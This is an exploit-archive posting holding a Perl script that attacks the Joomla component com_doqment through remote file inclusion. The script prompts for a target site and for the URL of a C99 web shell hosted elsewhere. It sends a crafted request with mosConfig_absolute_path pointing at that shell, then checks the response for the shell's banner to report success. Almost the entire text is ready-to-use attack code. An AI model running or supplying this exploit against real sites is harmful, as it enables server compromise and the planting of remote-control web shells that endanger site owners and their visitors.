ExploitFixes
[D] Joomla Component com_doqment Remote File Inclusion Vulnerability [z] 2011-02-03 15:15:37
Inviato da: kedans

#!/usr/bin/perl
# Name : [D] Joomla Component com_doqment Remote File Inclusion Vulnerability [z]
#------------------------------------------
# Detecting Date : 21/11/2010
# Divloperd Perl Date : [HST2011]
# Type : php , perl
# Exp : Upload shell C99.php
#-------------------------------------------
# Author : KedAns-Dz < ked-h (at) hotmail (dot) com >
# Team : [D] HaCkerS-StreeT-Team [z]
# special thanks to : Mr.Dak007 (+) TOnyXED

#Start SyStem : /root/@/MS-Dos :=>
system ("title By KedAns-Dz");
system ("color 1e");
system ("cls");
print " \n";
print "-:|==================================================|:-\n";
print "-:| [!] Joomla com_doqment RFI (Up->C99_shell.php) |:-\n";
print "-:| |:-\n";
print "-:| [!] Author: KedAns-Dz |:-\n";
print "-:| |:-\n";
print "-:| [!] Mail: ked-h(at)hotmail(dot)com |:-\n";
print "-:|==================================================|:-\n";
sleep (2);
print " \n";
use LWP::UserAgent;
print "\n> Web Target: 'http://www.target.com/path/' : \n";
print " \n";
print "> ";
chomp(my $target=<STDIN>);
print "\n> root Shell : 'http://[my-space]/c99.php' : \n";
print " \n";
print "> ";
chomp(my $shell=<STDIN>);
$host = $target."index.php?option=com_doqment&cid=admin.ponygallery.html.php?mosConfig_absolute_path=".$shell ;
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/!C99Shell v. !/){
print "[+] Exploit succeeded !! ...\n";
print "\n";
print "[+] Sh3ll Url : ";
print "\n";
print "$host";
print "\n";
print "-::| By KedAns-Dz |::-\n";
print "\n";
print " [D] HaCkerS-StreeT-Team [Z] ";
print "\n";
print "Allaho Akbar\n";
print "\n";
}
else{print "\n[-] Errur Exploit!...\n";
}
# --- END ! ---
# KedAns , Algeria - HMD -
# By KedAns-Dz
#------------------------------------------------------------------------------------------
# [D] HaCkerS-StreeT-Team [Z] > Algerians HaCkErs <
# -- [>>] KedAns-Dz * BadR0 * XoreR * Dr.Ride * Fox-Dz * Red1One[<<] --
# -- [>] IslamPard * NoR0 FouinY * Zaki.ENG * Hani NiN0 * MasSinh0u-Dz [<] --